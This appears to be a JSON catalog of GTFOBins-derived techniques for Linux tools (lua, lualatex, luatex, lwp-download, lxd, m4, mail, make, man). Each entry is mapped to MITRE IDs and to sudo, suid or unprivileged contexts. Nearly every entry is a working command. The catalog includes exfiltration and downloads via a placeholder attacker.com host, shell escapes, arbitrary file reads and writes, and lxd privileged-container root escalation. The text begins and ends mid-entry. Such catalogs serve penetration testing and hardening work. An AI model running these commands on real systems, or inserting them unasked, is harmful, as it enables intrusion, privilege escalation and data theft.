s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:sudo","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:suid","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lualatex:inherit:0:unprivileged","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lualatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:sudo","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:suid","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:luatex:inherit:0:unprivileged","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/luatex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:download:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:download:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-read:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-read:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:1:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-download:file-write:1:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-request:file-read:0:sudo","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lwp-request:file-read:0:unprivileged","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:0:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:0:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:1:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lxd:shell:1:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:command:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:file-read:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:m4:shell:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:0:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mail:shell:1:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-read:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:file-write:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:sudo","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:suid","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:make:shell:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:sudo","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:suid","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:file-read:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:sudo","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:suid","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:inherit:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:shell:0:sudo","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 